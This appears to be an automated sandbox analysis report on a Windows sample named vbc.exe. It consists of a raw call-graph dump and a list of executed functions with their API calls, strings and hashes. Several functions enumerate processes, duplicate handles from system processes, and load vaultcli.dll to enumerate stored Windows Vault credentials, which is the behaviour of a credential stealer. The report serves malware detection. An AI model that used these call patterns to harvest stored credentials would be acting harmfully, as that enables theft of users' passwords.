36916->36918 36926 413385 11 API calls 36916->36926 36917 42dee7 36917->36916 36921 42df60 36917->36921 36917->36923 36918->36923 36920 42df51 36920->36918 36920->36923 36927 4141d6 11 API calls 36921->36927 36923->36909 36924->36923 36925->36917 36926->36920 36927->36923 37111 437c94 17 API calls 37113 422ed5 130 API calls 37114 40109f 42 API calls 37115 43e8a0 22 API calls 37296 4016a7 10 API calls 37297 41c6aa 11 API calls 37118 412cad InterlockedCompareExchange DeleteCriticalSection 37298 43faaf 149 API calls 37300 43eab2 13 API calls 37301 411eb2 memset _itow WritePrivateProfileStringW GetPrivateProfileIntW 37302 4276b6 12 API calls __allrem 37123 4150b6 27 API calls 37124 40d0b9 8 API calls 37303 42babb 17 API calls 37126 4320bf 15 API calls 37127 412d43 LeaveCriticalSection 37307 418f44 105 API calls 37310 43f34b 15 API calls 37311 402f4a 16 API calls 37314 412351 memset SHGetPathFromIDListW SendMessageW 37315 401751 ExitProcess 36892 442550 36895 44252a 36892->36895 36894 442559 36896 442533 _onexit 36895->36896 36897 442539 __dllonexit 36895->36897 36896->36897 36897->36894 37316 40a759 11 API calls 37317 40475a 32 API calls 37319 40275c 19 API calls 37132 442d5b FreeLibrary 37133 426d63 13 API calls 37134 422ed5 131 API calls 37135 431567 14 API calls 37320 40f767 72 API calls 37321 422ed5 153 API calls 37137 41616b GetSystemTimeAsFileTime 37322 409b6a 27 API calls 37323 41176d 44 API calls 36885 412b6f free 37324 427f72 150 API calls 37138 43fd71 145 API calls 37142 430175 141 API calls 37326 414f76 FlushFileBuffers GetLastError 37143 43eb15 19 API calls 37145 42cd7e 149 API calls 37031 442d7a 37032 442d83 ??3@YAXPAX 37031->37032 37033 442d8a 37031->37033 37032->37033 37034 442d93 ??3@YAXPAX 37033->37034 37035 442d9a 37033->37035 37034->37035 37036 442da3 ??3@YAXPAX 37035->37036 37037 442daa 37035->37037 37036->37037 37038 442db3 ??3@YAXPAX 37037->37038 37039 442dba 37037->37039 37038->37039 37328 40c77e 8 API calls 37329 423881 128 API calls 37040 411f7e EnumResourceNamesW 37146 401501 6 API calls 37331 40a302 7 API calls 37147 423186 121 API calls 37333 440f0c memcmp 35420 43eb0a 148 API calls 37334 415308 SetFilePointer GetLastError GetLastError SetEndOfFile GetLastError 37150 43fd08 140 API calls 37150->37150 37156 412915 17 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 37336 43fb16 144 API calls 37337 403718 memset wcscat wcslen memcpy _wcsicmp 37338 42af18 164 API calls 37158 43fd10 165 API calls 37339 43231f 16 API calls 37161 412d25 DeleteCriticalSection 37341 422ed5 127 API calls 37163 42a92b 19 API calls 37165 42b928 148 API calls 37342 426b20 35 API calls 37343 416b2c 12 API calls 37166 43f92d 149 API calls 36886 412b2e malloc 36887 412b56 36886->36887 36888 412b49 36886->36888 36890 413f8e 11 API calls 36887->36890 36890->36888 37167 44252b _onexit 36891 440134 19 API calls 37344 40b730 15 API calls 37168 422ed5 127 API calls 37345 422ed5 133 API calls 37170 412d34 EnterCriticalSection 37171 423881 122 API calls 37346 40273a 7 API calls 37173 404d3c 49 API calls 37174 442539 __dllonexit 37175 442d39 ??3@YAXPAX 37348 43efcb 18 API calls 37178 40d1d0 139 API calls 37180 4021d9 20 API calls 37182 42a99c 16 API calls 37184 4035dd modf 37353 4427d9 _XcptFilter 37354 4033df 38 API calls 37355 422ed5 129 API calls 37186 441de1 8 API calls 37358 4427ed _exit _c_exit 37359 410beb 8 API calls 37188 4099f0 10 API calls 37190 43fdf1 12 API calls 37013 4153f4 37014 415490 37013->37014 37019 415409 37013->37019 37015 415425 UnmapViewOfFile CloseHandle 37015->37015 37015->37019 37017 41545b 37017->37019 37025 415d4d 20 API calls 37017->37025 37019->37014 37019->37015 37019->37017 37020 414de6 37019->37020 37021 414e05 FindCloseChangeNotification 37020->37021 37022 414df7 37021->37022 37023 414e0e 37021->37023 37022->37023 37024 414dfd Sleep 37022->37024 37023->37019 37024->37021 37025->37017 37192 415df9 17 API calls 37361 43ebfb 148 API calls 37362 43fbf9 8 API calls 37363 423623 memcpy memset memcpy memcpy memset 37364 422ed5 128 API calls 37196 43f181 16 API calls 37199 43eb18 177 API calls 35258 425f85 35259 425f96 35258->35259 35261 427285 35258->35261 35263 425fe3 35259->35263 35264 425fdc 35259->35264 35274 422ed5 35259->35274 35260 42319e 35321 413f8e 11 API calls 35260->35321 35291 42329a 35261->35291 35328 413490 11 API calls 35261->35328 35323 41da74 98 API calls 35263->35323 35295 41d96a 35264->35295 35265 423186 35265->35291 35315 413490 11 API calls 35265->35315 35266 4238a1 35322 421a7e 121 API calls 35266->35322 35274->35260 35274->35261 35274->35265 35275 427211 35274->35275 35276 42031b memset memcpy memcpy 35274->35276 35281 423865 35274->35281 35294 4231fc 35274->35294 35311 420020 memset memcpy 35274->35311 35312 4203b4 15 API calls 35274->35312 35313 42038d memset memcpy memcpy 35274->35313 35314 41fe70 13 API calls 35274->35314 35316 421a29 11 API calls 35274->35316 35317 421967 91 API calls 35274->35317 35278 42722a 35275->35278 35279 42725f 35275->35279 35276->35274 35324 413490 11 API calls 35278->35324 35283 42725a 35279->35283 35326 413f8e 11 API calls 35279->35326 35320 413490 11 API calls 35281->35320 35327 421a7e 121 API calls 35283->35327 35284 42723e 35325 413f8e 11 API calls 35284->35325 35294->35265 35318 41fe70 13 API calls 35294->35318 35319 41ff10 12 API calls 35294->35319 35296 41d97c 35295->35296 35298 41d981 35295->35298 35338 41bc96 98 API calls 35296->35338 35299 41d9e3 35298->35299 35300 41da59 35298->35300 35303 41d992 35298->35303 35301 41d9e8 35299->35301 35302 41da0c 35299->35302 35300->35303 35304 41d58e 87 API calls 35300->35304 35329 41d40b 35301->35329 35302->35303 35307 41da2f 35302->35307 35335 41d47c 35302->35335 35303->35274 35304->35303 35307->35303 35309 41d96a 98 API calls 35307->35309 35309->35303 35311->35274 35312->35274 35313->35274 35314->35274 35315->35260 35316->35274 35317->35274 35318->35294 35319->35294 35320->35260 35321->35266 35322->35291 35323->35274 35324->35284 35325->35283 35326->35283 35327->35261 35328->35260 35330 41d428 35329->35330 35333 41d421 35329->35333 35343 41c656 35330->35343 35334 41d469 35333->35334 35353 441921 11 API calls 35333->35353 35334->35303 35339 41d58e 35334->35339 35336 41c69b 87 API calls 35335->35336 35337 41d48d 35336->35337 35337->35302 35338->35298 35341 41d595 35339->35341 35340 41d5db 35340->35303 35341->35340 35342 41d40b 87 API calls 35341->35342 35342->35341 35344 41c671 35343->35344 35345 41c662 35343->35345 35354 41c5dd 35344->35354 35357 441921 11 API calls 35345->35357 35348 41c66c 35348->35333 35351 41c688 35351->35348 35359 41c69b 35351->35359 35353->35334 35363 419681 35354->35363 35357->35348 35358 41c3b5 11 API calls 35358->35351 35360 41c6a0 35359->35360 35361 41c6a8 35359->35361 35419 4197c8 87 API calls 35360->35419 35361->35348 35364 41969e 35363->35364 35365 41968e 35363->35365 35368 4196bb 35364->35368 35384 416492 35364->35384 35398 441921 11 API calls 35365->35398 35369 419698 35368->35369 35371 419769 35368->35371 35372 419700 35368->35372 35382 419716 35368->35382 35369->35348 35369->35358 35401 441921 11 API calls 35371->35401 35374 41971f 35372->35374 35377 419711 35372->35377 35375 419730 35374->35375 35374->35382 35376 419753 memset 35375->35376 35378 419743 35375->35378 35399 41629c memset memcpy memset 35375->35399 35376->35369 35388 418442 35377->35388 35400 417a52 memset memcpy memset 35378->35400 35382->35369 35402 417c82 87 API calls 35382->35402 35383 41974f 35383->35376 35385 4164a1 35384->35385 35386 4164c3 35385->35386 35387 416580 memset memset 35385->35387 35386->35368 35387->35386 35389 418481 35388->35389 35390 41846e memset 35388->35390 35393 418499 35389->35393 35403 41b444 19 API calls 35389->35403 35391 418508 35390->35391 35391->35382 35395 4184d0 35393->35395 35404 4129d7 35393->35404 35395->35391 35396 4184fc memcpy 35395->35396 35397 4184ef memset 35395->35397 35396->35391 35397->35391 35398->35369 35399->35378 35400->35383 35401->35382 35403->35393 35407 414e1c 35404->35407 35415 414d9f SetFilePointer 35407->35415 35410 414e39 ReadFile 35411 414e66 35410->35411 35412 414e56 GetLastError 35410->35412 35413 4129ed 35411->35413 35414 414e6d memset 35411->35414 35412->35413 35413->35395 35414->35413 35416 414de1 35415->35416 35417 414dcb GetLastError 35415->35417 35416->35410 35416->35413 35417->35416 35418 414dd7 GetLastError 35417->35418 35418->35416 35419->35361 35421 43eb10 148 API calls 35421->35421 37366 412b88 12 API calls 37202 43218e 16 API calls 37203 42a98f 17 API calls 37367 441389 40 API calls 37205 43eb18 151 API calls 37369 416b91 memset 37207 428591 151 API calls 37209 43eb18 24 API calls 37211 4269a2 15 API calls 37213 4161a0 27 API calls 37371 43f3a0 14 API calls 37371->37371 37372 4097a5 wcslen wcslen 37216 43eb18 141 API calls 37375 4107aa 7 API calls 37217 4015b0 16 API calls 37218 4315b2 16 API calls 36928 43ebb7 36953 43e4ce 36928->36953 36930 43eb68 36932 43eb15 36934 43eb60 36932->36934 36935 43fe58 36932->36935 36934->36930 36956 43e72c 12 API calls 36934->36956 36935->36930 36957 43e68c memset 36935->36957 36938 42e00a 36939 42e020 36938->36939 36948 42e049 36938->36948 36958 429884 148 API calls 36939->36958 36942 42e038 36944 42e04d 36942->36944 36945 42e03d 36942->36945 36943 42e094 36943->36932 36959 429056 memset 36944->36959 36963 4141d6 11 API calls 36945->36963 36965 429056 memset 36948->36965 36949 42e058 36960 42937e 36949->36960 36951 42e064 36964 41345d memcpy 36951->36964 36990 428e00 36953->36990 36956->36930 36957->36935 36958->36942 36959->36949 36966 42917d 36960->36966 36963->36948 36964->36948 36965->36943 36967 429192 36966->36967 36987 429332 36966->36987 36968 42921a memcpy 36967->36968 36969 429229 memcpy memset 36967->36969 36967->36987 36970 429276 36968->36970 36969->36970 36971 429295 memcpy 36970->36971 36972 4292af 36970->36972 36971->36972 36974 4292d5 36972->36974 36975 4292da 36972->36975 36976 4292ca 36972->36976 36977 429346 36974->36977 36982 4292f7 36974->36982 36989 429395 memcpy memcpy memcpy memset memcpy 36975->36989 36988 42960c memcpy memcpy memcpy memset memcpy 36976->36988 36980 42917d memcpy 36977->36980 36977->36987 36981 429360 36980->36981 36983 42917d memcpy 36981->36983 36984 42917d memcpy 36982->36984 36982->36987 36983->36987 36985 42931e 36984->36985 36986 42917d memcpy 36985->36986 36986->36987 36987->36951 36988->36974 36989->36974 36997 428cae 36990->36997 36992 428e0e 37003 428da6 36992->37003 36994 428e20 36995 428e2f 36994->36995 37010 428b8a 11 API calls 36994->37010 36995->36930 36995->36932 36995->36938 36998 428cc1 36997->36998 36999 4132ea memset 36998->36999 37000 428cee 36999->37000 37001 428d15 memcpy 37000->37001 37002 428d07 37000->37002 37001->37002 37002->36992 37004 428dad 37003->37004 37007 428dc6 37003->37007 37011 429056 memset 37004->37011 37006 428db7 37012 429056 memset 37006->37012 37007->36994 37009 428dc1 37009->36994 37010->36995 37011->37006 37012->37009 37220 422ed5 156 API calls 37377 40a3b6 8 API calls 37221 4049b7 SendDlgItemMessageW SendDlgItemMessageW SetDlgItemTextW GetDlgItemTextW 37379 430fb8 20 API calls 37224 422ed5 127 API calls

                                                                                                                                                    Executed Functions

                                                                                                                                                    Function 00408836 Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 234filenativeCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 204 408836-40889c memset call 40757a CreateFileW 207 4088a2-4088ba call 4085eb call 40fc89 204->207 212 4088bc-4088cb NtQuerySystemInformation 207->212 213 4088cd 207->213 214 4088d1-4088d8 212->214 213->214 215 4088da-4088ea 214->215 216 4088ec-408903 FindCloseChangeNotification GetCurrentProcessId 214->216 215->207 215->216 217 408905-408909 216->217 218 40892b-408967 call 411196 216->218 217->218 219 40890b 217->219 223 408ae5-408ae8 218->223 224 40896d-408994 call 4091f6 call 407602 _wcsicmp 218->224 222 40890e-408914 219->222 225 408925-408929 222->225 226 408916-40891d 222->226 229 408af6-408b0d call 402778 * 2 223->229 230 408aea-408af3 FreeLibrary 223->230 238 4089c0-4089d0 OpenProcess 224->238 239 408996-4089a7 _wcsicmp 224->239 225->218 225->222 226->225 228 40891f-408922 226->228 228->225 230->229 241 408ad1-408ad4 238->241 242 4089d6-4089db 238->242 239->238 240 4089a9-4089ba _wcsicmp 239->240 240->238 243 408ad6-408adf 240->243 241->223 241->243 244 4089e1 242->244 245 408ac8-408acb CloseHandle 242->245 243->223 243->224 246 4089e4-4089e9 244->246 245->241 247 408a96-408aa4 246->247 248 4089ef-4089f6 246->248 247->246 249 408aaa-408aac 247->249 248->247 250 4089fc-408a23 GetCurrentProcess DuplicateHandle 248->250 249->245 250->247 251 408a25-408a4f memset call 40fc89 250->251 254 408a51-408a63 251->254 255 408a68-408a94 CloseHandle call 407602 * 2 _wcsicmp 251->255 254->255 255->247 260 408aae-408ac6 255->260 260->245
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040885E
                                                                                                                                                      • Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585
                                                                                                                                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 00408885
                                                                                                                                                      • Part of subcall function 004085EB: ??2@YAPAXI@Z.MSVCRT ref: 004085F4
                                                                                                                                                      • Part of subcall function 0040FC89: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,004088B3,?,000000FF,00000000,00000104), ref: 0040FC9C
                                                                                                                                                      • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040FCB3
                                                                                                                                                      • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040FCC5
                                                                                                                                                      • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040FCD7
                                                                                                                                                      • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040FCE9
                                                                                                                                                      • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040FCFB
                                                                                                                                                      • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtQueryObject), ref: 0040FD0D
                                                                                                                                                      • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 0040FD1F
                                                                                                                                                      • Part of subcall function 0040FC89: GetProcAddress.KERNEL32(NtResumeProcess), ref: 0040FD31
                                                                                                                                                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 004088C6
                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 004088EF
                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 004088FA
                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040898B
                                                                                                                                                    • _wcsicmp.MSVCRT ref: 0040899E
                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004089B1
                                                                                                                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,?,?,000000FF,00000000,00000104), ref: 004089C5
                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 00408A0B
                                                                                                                                                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 00408A1A
                                                                                                                                                    • memset.MSVCRT ref: 00408A38
                                                                                                                                                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 00408A6B
                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00408A8B
                                                                                                                                                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 00408ACB
                                                                                                                                                    • FreeLibrary.KERNELBASE(?,?,?,000000FF,00000000,00000104), ref: 00408AED
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindFreeInformationLibraryNameNotificationOpenQuerySystem
                                                                                                                                                    • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                    • API String ID: 1954110673-3398334509
                                                                                                                                                    • Opcode ID: 4d8f3214a43bd04c3f84bf4d7629163f604b80433559b2a465285cddf8bf93b4
                                                                                                                                                    • Instruction ID: ac6d74245de41f4a68afaf46936feeb9e4215e23a81ac82868d75cf9687b4f7b
                                                                                                                                                    • Opcode Fuzzy Hash: 4d8f3214a43bd04c3f84bf4d7629163f604b80433559b2a465285cddf8bf93b4
                                                                                                                                                    • Instruction Fuzzy Hash: FB9115B1D00209AFDB10EF95C985AAEBBB5FF04305F60447FE949B6291DB399E40CB58
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004422C7 Relevance: 26.3, APIs: 8, Strings: 7, Instructions: 40libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 319 4422c7-4422cb 320 4422cd-44233a LoadLibraryW GetProcAddress * 7 319->320 321 44233b 319->321 320->321
                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryW.KERNELBASE(vaultcli.dll,?,00000000,00442385,?,00000000,?), ref: 004422D4
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 004422E9
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 004422F6
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 00442303
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 00442310
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultGetInformation), ref: 0044231D
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 0044232B
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 00442334
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                    • String ID: VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetInformation$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                                                                                                                    • API String ID: 2238633743-2107673790
                                                                                                                                                    • Opcode ID: 963817e17c3864fb71b6f00927cb3e5fc30341a44c0b645a38e795921616907a
                                                                                                                                                    • Instruction ID: a68d3860b1f677998bacfaa0c7abd00484677722be3dbe7bb4ba7aced869f3e7
                                                                                                                                                    • Opcode Fuzzy Hash: 963817e17c3864fb71b6f00927cb3e5fc30341a44c0b645a38e795921616907a
                                                                                                                                                    • Instruction Fuzzy Hash: CB012874941B04AEEB306F728E88E07BEF4EF94B017108D2EE49A92A10D779A800CE14
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411196 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 143processlibraryloaderCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 322 411196-4111ec call 402778 CreateToolhelp32Snapshot memset Process32FirstW 325 41134c-41135d Process32NextW 322->325 326 4111f1-411239 OpenProcess 325->326 327 411363-411373 CloseHandle 325->327 328 4112fc-411301 326->328 329 41123f-411272 memset call 411376 326->329 328->325 330 411303-411309 328->330 337 4112c5-4112e9 call 410df5 call 411140 329->337 338 411274-411281 329->338 332 411314-411326 call 407475 330->332 333 41130b-411312 free 330->333 335 411327-41132e 332->335 333->335 340 411330 335->340 341 411333-41134a 335->341 349 4112ee-4112fa CloseHandle 337->349 342 411283-411290 GetModuleHandleW 338->342 343 4112ad-4112b4 338->343 340->341 341->325 342->343 345 411292-4112a8 GetProcAddress 342->345 343->337 346 4112b6-4112c3 QueryFullProcessImageNameW 343->346 345->343 346->337 349->328
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00402778: free.MSVCRT(00000000,0040E508,?,?,?,?,?,/deleteregkey,/savelangfile,?,?), ref: 0040277F
                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004111B6
                                                                                                                                                    • memset.MSVCRT ref: 004111CB
                                                                                                                                                    • Process32FirstW.KERNEL32(?,?), ref: 004111E7
                                                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,?,00001000,?,00000000), ref: 0041122C
                                                                                                                                                    • memset.MSVCRT ref: 00411253
                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00411288
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 004112A2
                                                                                                                                                    • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,?,00000000,?), ref: 004112C3
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 004112F4
                                                                                                                                                    • free.MSVCRT(?), ref: 0041130D
                                                                                                                                                    • Process32NextW.KERNEL32(?,0000022C), ref: 00411356
                                                                                                                                                    • CloseHandle.KERNEL32(?,?,0000022C), ref: 00411366
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                                                                                                                                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                    • API String ID: 3536422406-1740548384
                                                                                                                                                    • Opcode ID: d60c901128d51a1a9a941b54c9a38706e9a618f48074c361322ebbbca8af7aa2
                                                                                                                                                    • Instruction ID: bbba850b15206e26884db202d857e323fd936e243bbe251c85cc099381913945
                                                                                                                                                    • Opcode Fuzzy Hash: d60c901128d51a1a9a941b54c9a38706e9a618f48074c361322ebbbca8af7aa2
                                                                                                                                                    • Instruction Fuzzy Hash: 7E51AF72840258ABDB21DF55CC84EDEB7B9EF94304F1001ABFA18E3261DB759A84CF54
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00408441 Relevance: 6.1, APIs: 4, Instructions: 58fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindFirstFileW.KERNELBASE(00000103,0000038B,00000000,?,00410790,?), ref: 00408457
                                                                                                                                                    • FindNextFileW.KERNELBASE(000000FF,0000038B,00000000,?,00410790,?), ref: 00408475
                                                                                                                                                    • wcslen.MSVCRT ref: 004084A5
                                                                                                                                                    • wcslen.MSVCRT ref: 004084AD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileFindwcslen$FirstNext
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2163959949-0
                                                                                                                                                    • Opcode ID: 80c24c4a0fd4be1e088faab584ff479ea008bcf4405b994ad439e2c2ad98ac31
                                                                                                                                                    • Instruction ID: 6e3c8222864954d55df90d51b8e56744ea09e2897b7152e8bd6019cb1af30d80
                                                                                                                                                    • Opcode Fuzzy Hash: 80c24c4a0fd4be1e088faab584ff479ea008bcf4405b994ad439e2c2ad98ac31
                                                                                                                                                    • Instruction Fuzzy Hash: E5118272515706AFD7149B24D984A9B73DCAF04725F604A3FF09AD31C0FF78A9448B29
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00411EF8 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 00411F05
                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 00411F16
                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00411F26
                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 00411F31
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                    • Opcode ID: adc4f220f09edc5477cff5d460e3159a0013e7b06a0f572b2b282906cd572301
                                                                                                                                                    • Instruction ID: cfb809c5d0a350ba8a2f28afb84d758f7034e38599ab5d81eab5ea4ee58a4c6c
                                                                                                                                                    • Opcode Fuzzy Hash: adc4f220f09edc5477cff5d460e3159a0013e7b06a0f572b2b282906cd572301
                                                                                                                                                    • Instruction Fuzzy Hash: 140192367042156BCB295FA5DC4999BBFAEFF867917088036F909C7331DB30D941C688
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00415F87 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00415EAF: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 00415EDB
                                                                                                                                                      • Part of subcall function 00415EAF: malloc.MSVCRT ref: 00415EE6
                                                                                                                                                      • Part of subcall function 00415EAF: free.MSVCRT(?), ref: 00415EF6
                                                                                                                                                      • Part of subcall function 00414BCA: GetVersionExW.KERNEL32(?), ref: 00414BED
                                                                                                                                                    • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 00416001
                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 00416029
                                                                                                                                                    • free.MSVCRT(00000000,?,00000000,?,00000000), ref: 00416032
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1355100292-0
                                                                                                                                                    • Opcode ID: 6d9bbb2232084d268bbffa8b88e6344bd84b9c6ec403a6433ede71687f16327b
                                                                                                                                                    • Instruction ID: 7d405d749a0edc351a3ddf496a078fe72cac754ac47b8191c628d3d1323914f3
                                                                                                                                                    • Opcode Fuzzy Hash: 6d9bbb2232084d268bbffa8b88e6344bd84b9c6ec403a6433ede71687f16327b
                                                                                                                                                    • Instruction Fuzzy Hash: 45219276804108EEEB21EBA4C8849EF7BBCEF09304F1100ABE641D7141E778CEC597A5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 004161B0 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 004161BB
                                                                                                                                                    • GetSystemInfo.KERNELBASE(00451CE0,?,00000000,00440C34,00000000,?,?,00000003,00000000,00000000), ref: 004161C4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000E.00000002.349823959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_14_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoSystemmemset
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3558857096-0
